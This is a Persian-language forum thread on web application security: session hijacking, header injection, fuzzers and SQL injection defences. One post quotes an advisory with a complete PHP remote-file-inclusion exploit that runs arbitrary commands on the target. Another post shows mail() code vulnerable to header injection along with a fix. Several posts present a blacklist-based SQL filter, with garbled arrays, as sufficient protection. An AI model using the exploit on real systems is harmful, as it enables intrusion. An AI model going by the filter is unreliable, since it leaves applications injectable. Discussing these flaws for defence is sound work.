امنیت در نرم افزار های تحت وب

[anubis_ir]

تا جایی که می دونم متغیر سشن مختص به هر کاربر هست و در دسترس سایر کاربران نیست، این متغیر هم فقط در حافظه سرور ذخیره می شود.
روش اعتبار سنجی هم به این صورت است که یک متغیر سشن را به محض لاگین صحیح مقدار دهی کرده و در صفحات دیگر آنرا بررسی می کنند. این روش کاملا تست شده و مشکلی نداره.
فقط بحث مصرف زیاد حافظه سرور در جایی که تعداد کاربر زیاد باشد ممکن است شاید مساله ساز شود.
اسنیف کردن http headers‌ در یک شبکه داخلی بر اساس متغیرهای post شده از صفحه کاملا میسر است ولی ارتباطی به سشن که در فقط سرور وجود خارجی دارد ، ندارد. (البته session_id را می شود اسنیف کرد)
بحث مربوط به های‌جک کردن یک سشن بین php و asp و asp.net متفاوت است. در php متغیرهای سشن در دایرکتوری tmp عموما ذخیره می شوند و در یک shared server اگر صاحب هاست موارد امنیتی محدود کردن کاربران را رعایت نکرده باشد ممکن است شاید بشود کارهایی کرد. و یا از طریق XSS exploits شاید بشود session_id شخص را بدست آورد و آنرا ایجاد و با سطح دسترسی او وارد شد. (شاید و متاسفانه این مورد در ISP‌های ایرانی و اشخاصی که از IP های مانند هم در یک بازه زمانی یک روزه استفاده می کنند زیاد رخ می دهد. برای مثال در فوروم های php شاید دیده باشید که چرا من بجای دیگری وارد شدم؟!! )
همچنین Session ID ممکن است در انتهای url‌ در سایتهایی که از php استفاده می کنند قرار گیرد و باز هم این مورد اگر ملاحظه نشود خطرناک است.
تمام این موارد پس از لاگین مجدد شخص و با فراخوانی تابع session_regenerate_id تقریبا قابل حل است.
در asp و asp.net عمده موارد فوق به صورت توکار در موتورهای مربوطه حل شده است و نیاز آنچنانی به دقت نظر خاصی ندارد.

[houtanal]

بحث در این مورد به هیچ وجه این نیست که متغییر ها و مقادیر یک نشست در کجا ذخیره میشوند.بحث سر داده ایست که بوسیله یک پروتکل Clear Text بین مرورگر و برنامه تحت وب تبادل میشه.در این موارد زبان برنامه نویسی تفاوتی نمی کنه (اصلا مهم نیست) ، مقصود بحث ، بررسی ضعف های یک پروتکل (در اینجا http) و نحوه استفاده یک مهاجم از اون هاست.

شاید پروکسی هایی مثل آشیل بتونه بهت کمک کنه منظورم رو کامل درک کنی.

[houtanal]

بدون شرح

==================================================  =====================================

*** :: Security Advisory                                                 2/11/2006

==================================================  =====================================

*** - Remote Command Execution Vulnerability

==================================================  =====================================

http://www.***.net/

http://www.***.net/***

==================================================  =====================================



:: Summary



      Vendor       :  ***

      Vendor Site  :  http://www.***.com/

      Product(s)   :  ***- Automated Hosting Suite

      Version(s)   :  All

      Severity     :  Medium/High

      Impact       :  Remote Command Execution

      Release Date :  2/11/2006

      Credits      :  ***(***(a) ***(.) net)



==================================================  =====================================



I. Description



By creating a product that integrates with the major payment processors, registrars, 

and provisioning tools on the market, ***gives your hosting company the power 

to bill and activate hosting accounts in real-time, even while you sleep at night!





==================================================  =====================================



II. Synopsis



There is a remote file inclusion vulnerability that allows for remote command execution

in the index.php file.  The bug is here on lines 5, 6, and 7: 



require("setup.php");

require("functions.php");

require("db.conf");

require($path . "que.php");

require($path . "provisioning_manager.php");

require($path . "registrar_manager.php");



the $path variable is not set prior to being used in the require() function.

The vendor is no longer offering updates for this software.



==================================================  =====================================



Exploit code:



-----BEGIN-----



<?php

/*

***Remote File Inclusion Exploit c0ded by ***

Sh0uts: ***net, ***, ***, #***, ***

url:  http://www.***.net/***

*/



$cmd = $_POST["cmd"];

$turl = $_POST["turl"];

$hurl = $_POST["hurl"];



$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"

    ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"

    ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"

    ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"

    ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"

    ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";



if (!isset($_POST['submit'])) 

{



echo $form;



}else{



$file = fopen ("test.txt", "w+");



fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); 

system(\"echo ++END++\"); ?>");

fclose($file);



$file = fopen ($turl.$hurl, "r");

if (!$file) {

    echo "<p>Unable to get output.\n";

    exit;

}



echo $form;



while (!feof ($file)) {

    $line .= fgets ($file, 1024)."<br>";

    }

$tpos1 = strpos($line, "++BEGIN++");

$tpos2 = strpos($line, "++END++");

$tpos1 = $tpos1+strlen("++BEGIN++");

$tpos2 = $tpos2-$tpos1;

$output = substr($line, $tpos1, $tpos2);

echo $output;



}

?>





------END------



==================================================  =====================================



IV. Greets :>



All of **, ***, ***, ***, ***, ***, ***.



==================================================  =====================================

[houtanal]

شاید ربط چندانی به امنیت در نرم افزار های تحت وب نداشته باشه اما:

دو راه معرفی کنید که حتی با داشتن پسورد مدیر سیستم عامل در حالی که مثلا Terminal Service هم بر روی سیستم فعال است افراد authorize نشده نتوانند به سیستم وارد شوند، ولی authorize شده ها بتوانند.
ایضا این در مورد یک Interface مدریتی یا هر بخش خصوصی تحت وب هم صادق است.

[houtanal]

راه اول:
در صورتی که یک Valid IP دارید;
در سطح فایروال یا برنامه دسترسی را برای تمامی ip ها بجز valid ip خودتون ببندید.با راه اندازی یک *** به کاربران مجاز این امکان را می دهید که مثلا خارج از شرکت هم با اتصال به *** به سرویس ها مورد نظر وصل شوند.

راه دوم:
استفاده از Certificate ها;
برای مثال اینترفیس مدیریتی تحت وب خود ویندوز را در نظر بگیرید.همه چیز حتی ActiveX برای اتصال به Terminal Service از طریق وب را هم داره.خیلی راحت می تونید با استفاده از Client Authentication Certificate تنها به افرادی که دارای گواهینامه هستند اجازه دسترسی به این بخش (یا هر بخشی از یک وب سایت) را بدهید.

می تونید بخش هایی از روش اول و دوم رو با هم استفاده کنید.

[houtanal]

نمومه استفاده از یک Certificate برای اعتبار سنجی کاربر.

[oxygenws]

بعد از مدت ها دارم دوباره مطالب ات رو از ابتدا می خونم :)
مسلما ممنون میشم اگر مورد جدیدی به تور ات خورده ما رو هم در جریان بذاری.

ضمنا، یک جا نوشتی که:

تابع htmlspecialchars ئر مواردی که می خوای از نام کاربری فارسی یا از یونیکد استفاده کنی برات مشکل درست می کنه
من ترجیح میدم با تعریف یک تابع که از توابعی مثل str_replace یا ereg_replace استفاده می کنه ورودی های خطرناک رو فیلتر کنم. :موفق:

فقط یه توضیح تکمیلی برای خوانندگان بدم که....
تابع htmlspecialchars پارامتر سومی داره که کاراکتر ست رو می گیره. برای ما ایرانی جماعت که عموما با utf-8 کار می کنیم، میشه اون رو روی "UTF-8" ست کرد.

[houtanal]

یک سری ابزارهایی هستند که تا حد امکان امنیت نرم افزار شما رو تست میکنند.این مسئله که الزاما ً جواب های درستی نخواهید گرفت (Flase Positive) چیز واضحیست.اما در هر صورت استفاده از نرم افزارهایی از این دست که اصطلاحا ً Fuzzer نامیده میشوند میتونه در مواقعی بسیار مفید باشه.
چند تایی رو صرفا ً معرفی میکنم.

Paros Proxy
یکی از بهترین fuzzer های رایگان و سورس باز به زبان جاوا برای برنامه های وبی که البته سایتش فیلتر شده!احتمالا ً تو sourcefoge.net میتونید دانلودش کنید.

OWASP WebScarab Project
ایضا ً نوشته شده با جاوا ، سورس باز و صد البته مناسب.http://www.owasp.org/index.php/Categ...Scarab_Project
(توصیه میکنم تو سایتش یه چرخی بزنید)

Watchfire® AppScan®
یکی از نرم افزارهای بسیار گران قیمت و مسلما ً قابل تامل.http://www.watchfire.com/products/appscan/default.aspx
(مقالات جالبی هم در سایتش پیدا میشه)

Burp suite
نرم افزار بسیار جالبی که البته مثل paros امکانات تست خودکار برنامه وبی رو نداره اما به هر حال نرم افزار جالبیه.
http://portswigger.net/suite/

تعداد انبوهی نرم افزار از این دست در وب پیدا میکنید.من تنها قصد دارم ایده کلی این گونه ابزارها رو منتقل کنم.به هر حال شخصا ً عموما ً چک کردن هدف رو به صورت دستی ترجیح میدم.

[houtanal]

Web Security Coding Tips


http://futureboy.homeip.net/security/

[houtanal]

http://www.securityfocus.com/infocus/1879

[Folaani]

یک مسئلهء دیگه که اینجا مطرح نشده Header Injection هست.
خیلی افراد از این نوع اطلاع ندارن؛ چیزهایی مثل SQL Injection خیلی معروف و شناخته شده هستن، اما این یکی چون کمتر پیش میاد و زیاد سر و صدایی نمیکنه خیلی ها ازش اطلاع ندارن.
این نوع حمله در پی اچ پی (البته لزوما ربطی به زبان خاصی نداره و در هر زبان دیگری هم میتونه پیش بیاد) اغلب در صفحاتی مثل Contact و یا هر صفحه ای که بهرحال اطلاعاتی رو از کاربر گرفته و ایمیل میکنه پیش میاد. اما نه در همهء این صفحات. مشکل وقتی ممکنه پیش بیاد که از پارامتر هدرهای اضافی تابع mail بطور مثال (هر تابع دیگری هم میتونه باشه!)، برای ارسال هدری که وابستگی به مقدار پر شده توسط کاربر داره استفاده میکنیم.
بطور مثال وقتی فرم شما یک قسمت برای پر کردن آدرس ایمیل فرستنده داره و شما این آدرس رو در هدر From ایمیل قرار میدید، تا بطور مثال در نرم افزارهای میل کلاینت (وبی و غیروبی) بطور خودکار اون آدرس بتونه برای Reply انتخاب بشه.
در این حالت شما اگر از این نوع حمله که بسیار ساده و بدون هیچ ابزار و دستکاری خاصی هم میتونه انجام بشه اطلاع نداشته باشید، فرم ایمیل شما میتونه توسط سوء استفاده کننده برای ارسال ایمیل به آدرس یا آدرسهای دلخواهش استفاده بشه. توجه کنید که این ایمیلها از سایت و آدرس شما برای شخص ثالث فرستاده میشه!
تازه فرستادن یک ایمیل متنی، کمترین حالت سوء استفاده از این فرمها هست که امکانش صددرصد و بسیار راحته.

یک نمونه از چنین کدی رو براتون میذارم:

mail(

$info_emails['admin'],

$_POST['subject'],

$_POST['message'],

//Additional headers parameter

(

($_POST['from'])?

"From: Contact form <{$_POST['from']}>":

'From: Contact form <admin@example.com>'

).

"\r\nCc: {$info_emails['cpanel']}, {$info_emails['yahoo']}\r\nContent-type: text/plain; charset=utf8",

//Additional headers parameter

"-f{$info_emails['return']}"

)

در اینجا $_POST['from'] نقطهء آسیب پذیر/ورودی کاربر هست.
چون دیگه وقت ندارم فورا راه حل رو قرار میدم:

if($_POST['from'] and (strpos(urldecode($_POST['from']), "\n")!==false or strpos(urldecode($_POST['from']), "\r")!==false))

exit('<center><h3 style="color: red">Header injection attempt detected!<br />Your message is not sent.</h3></center>');

باید این کد رو قبل از اون کد قبلی قرار بدید تا درصورت شناسایی این حمله، برنامه با پیغام مناسب (بری دماغ سوختگی طرف!! البته شوخی میکنم.) خارج بشه.

----------------

راستی برای تست کار کردن این کد، در فیلد مورد نظر (From) توالی کاراکترهای %0A و/یا %0D رو همراه هر اطلاعات دلخواه دیگری وارد کنید؛ برنامه باید حمله رو شناسایی کنه.
البته اگر درست یادم باشه و کاراکترهای مورد استفاده در حمله رو درست ذکر کرده باشم (توجه کنید که کد شناسایی حمله صحیحه، ولی کاراکترها به احتمال زیاد درستن).

[mehrdad201]

دوست عزیز یه مقدار در مورد سوء استفاده از $_POST['from'] بیشتر توضیح میدید!!

خیلی برام مهمه. به نظر شما ما اگه اول بیایم مقدار $_POST['from'] رو داخل یه متغیر بریزیم و بعد مقدار متغیر رو چک کنیم آیا میتونه مفید باشه ؟؟؟؟؟؟؟
لطفا در این مورد ایمیل من رو راهنمایی کنید

[mehrdad201]

راستی در مورد sqlinjection هم من یه جایی خوندم که تو asp.net با استفاده از پارامترها مشکل injection حل شده.

من خودم هم تست کردم و دیدم که وقتی یه مقدار که توش ' به کار رفته رو میدید اصلا مشکلی به وجود نمیاد.
البته من در این زمینه حرفه ای نیستم. خواهش می کنم دوستانی که حرفه ای تر هستند در این مورد نظرات خودشون رو بیان کنند.

[mermaid]

ا.... پس چرا تموم شد؟!

آقای صاحب تاپیک چرا بحث رو ادامه نمی دی؟! راستش من یه ایده واقعا معرکه دارم که بدبختانه مجبورم خودم پیاده اش کنم :D البته با PHP خیلی راحتم و احتمالا زبان برگزیده همینه! ولی یک... نه، چند تا سوال دارم:

من C#‎ هم بلدم (البته کمی تا نیمه ابری) ولی چون خون Open Source تو رگهام می جوشه و در ضمن، با انتخاب این زبان درصد بدبختیم بالا میره ، (سوال اینه:) به نظر شما با کدوم یکی امنیت رو بیشتر میشه حفظ کرد C#‎ or PHP ?


راستی چطوری میشه کدهای PHP رو کامپایل کرد؟! و اینکه آیا کامپایل کردنش میتونه جلوی بعضی از نفوذ ها رو بگیره؟! اصلا چرا کامپایلش می کنن؟!


یه سوال دیگه : فایل های فلش که روی سایت استفاده میشه و قراره اطلاعاتی رو به سرور ارسال کنه قابل هک کردن هست؟! (می دونم هست :D) چه طوری میشه از هک شدنشون جلوگیری کرد؟!

[houtanal]

http://www.security-hacks.com/2007/0...ction-scanners

[farzad_vb62]

آيا تابعي براي فيلتر سازي وروديها و حذف کدهاي مخرب وجود نداره؟!!!

[webcar jaded]

با سلام
لطفا یکی هر چه سریعتر بهم کمک کنه .من تازه کارم .میخوام که یک جدول با بک رکود و3 فیلد در my sql بسازم .و توی phpآن رو در قسمت log in به کار ببرم .ضمنا نحوی ارتباطشون رو هم نمی دونم ؟لطفا با توضیح مفصل برایم بفرستید تا من سر در بیاورم

[kianooshjon]

با این نفاسیر شما من فکر کنم که asp.net و C#‎ از php ایمن تر باشه 1.بخاطر اینکه امکان دسترسی به فولدرهای دیگه به غیر از فولدر مسیر جاری به سادگی نمیشه 2.بحث sql enjection کاملا منحله و کاربردی ندارد.3.sessoin سمت کاربر بصورت خودکار encrypt میشه 4.....

[sinsin666]

دوست عزیز منظور از این کار چی هست....
لطف کنین صریح بیان کنین......

به نظر بودار میاد......

[Nima NT]

به این کار میگن تبلیغات بدون در نظر گرفتن حقوق دیگران , چند روز صبر کنی مدیر دخلشو میاره

[محمدامین شریفی]

گوگل برای جلوگیری از فعالیت spider هایی که باعث شلوغ شدن سرور هایش می شود و جلوگیری از مشکلاتی این چنینی راهکارهایی را در نظر گرفته است.اصولا برنام نویسانی که مشغول به طراحی وب هستند،باید چه تمهیداتی را جهت جلوگیری از این حملات مخرب،در نظر گیرند؟

[joker]

به نقل از :http://www.developercenter.ir/forum/...ad.php?t=18325
نمیدونم قبلا توی این بخش یا بخش دات نت ارائه شده یا نه ، در هر حال

دانلود کتاب نکته های امنیتی در صفحات ASP.NET

نام کتاب : نکته های امنیتی در Asp.Net
نویسنده : هاشم
زبان کتاب : فارسی
قالب کتاب : PDF
حجم فایل : 733 Kb
توضیحات :امروزه استفاده از صفحات Asp.net یکی از مهمترین کارهای برنامه نویسان وب است. ولی این صفحات دارای ضعفهای فراوان میباشند. این کتاب ضعفهای مذکور را در قالب هشت بخش مختلف به برنامه نویسان asp.net گوشزد میکند.

دانلود کتاب

[nadia2174]

آموزش روش استفاده از SqlInjection (فارسی)
http://alfa-web.net/EduContent.aspx?EduID=22

[m_farshad]

دو تابع زیر میتونه شما رو از شر sql injection راحت کنه

	public function encode_safe_sql($str){



		$pattern=array("#","\\","'",'"',"<",">"," or "," and ","&"," Delete "," Update "," Insert "," Replace ");

		$replace=array("^35^","^92^","^39^","^34^","^60^",  "^62^","^111114^","^97110100^","^amp;^",

					"^100101108101116101^","^11711210097116101^","^105  110115101114116^","^1141011121089799101^");

		$str=str_ireplace($pattern, $replace, $str);

		

		return $str;

	}



	public function decode_safe_sql($str){

		$find=array("^35^","^92^","^39^","^34^","^60^","^6  2^","^111114^","^97110100^","^amp;^",

					"^100101108101116101^","^11711210097116101^","^105  110115101114116^","^1141011121089799101^");

		$replace=array("#","\\","'",'"',"<",">"," or "," and ","&"," Delete "," Update "," Insert "," Replace ");

		$str=str_replace($find,$replace,$str);



		return $str;



	}

[zoghal]

تابع برای sql inkection زیاد هست. اما تابع قوی برای xss ندیدم تا الان. همشون یک مشکلی داره

[__Genius__]

سلام ،
یه کتاب هست برای موارد SQL Injection ، کتاب بسیار کاملی هست ، از انتشارات Syngress که معمولاً کتابهای Top در زمینه امنیت زیاد ارائه کرده و میکنه .

Syngress (5-2009) | PDF | 474 pages | 1597494240 | 3.42Mb

SQL Injection Attacks and Defense /by Justin Clarke (Author).SQL injection represents one of the most dangerous and well-known, yet misunderstood, security vulnerabilities on the Internet, largely because there is no central repository of information to turn to for help. This is the only book devoted exclusively to this long-established but recently growing threat. It includes all the currently known information about these attacks and significant insight from its contributing team of SQL injection experts.
# What is SQL injection?-Understand what it is and how it works
# Find, confirm, and automate SQL injection discovery
# Discover tips and tricks for finding SQL injection within the code
# Create exploits using SQL injection
# Design to avoid the dangers of these attacks

اگر کسی احیاناً علاقمند به دانلود بود برای لینک پیغام خصوصی بذاره .

پیوست » کتاب های دیگه ای توی زمینه Web Hacking و بحث Web Security موجود هست که با یک جستجو توی آمازون و موارد مشابه پیدا میشه و به مقدار زیادی حاوی اطلاعات مفید هستن .

[Derambakht]

سلام
میشه سعی کنید این dll رو Refactor نمایید
با تشکر . (فوری)

[aliramazani]

دو تابع زیر میتونه شما رو از شر sql injection راحت کنه

	public function encode_safe_sql($str){



		$pattern=array("#","\\","'",'"',"<",">"," or "," and ","&"," Delete "," Update "," Insert "," Replace ");

		$replace=array("^35^","^92^","^39^","^34^","^60^",  "^62^","^111114^","^97110100^","^amp;^",

					"^100101108101116101^","^11711210097116101^","^105  110115101114116^","^1141011121089799101^");

		$str=str_ireplace($pattern, $replace, $str);

		

		return $str;

	}



	public function decode_safe_sql($str){

		$find=array("^35^","^92^","^39^","^34^","^60^","^6  2^","^111114^","^97110100^","^amp;^",

					"^100101108101116101^","^11711210097116101^","^105  110115101114116^","^1141011121089799101^");

		$replace=array("#","\\","'",'"',"<",">"," or "," and ","&"," Delete "," Update "," Insert "," Replace ");

		$str=str_replace($find,$replace,$str);



		return $str;



	}

چطوری و کجا ازش استفاده کنم؟

[aliramazani]

من از این دو تابع چطوری استفاده کنم؟

[houtanal]

برای استفاده از این توابع یا هر چیز مشابه دیگه ای باید عبارتی رو که می خوای فیلتر بشه جای اون str$ بزاری.

[aliramazani]

مثلا یه دستور select را میشه برام مثال بزنید؟

[میلاد قاضی پور]

من در مورد sql injection , xss کارهایی روی سایتم انجام دادم و تا حد ممکن در این موارد جدی عمل کردم . سایتم asp هست و از session ها استفاده ای نکردم . در مورد حملات RFI, LFI چه کارهایی لازمه انجام بدم ؟ به زبان انگلیسی که منابع کاملی پیدا نکردم و اکثرا برای پی اچ پی بودن .
*برام مهمه که افراد موزی به محتوای فایهای cs سایتم دسترسی نداشته باشن .

[amdi68]

خیلی عالی تشکر بابت توضیحات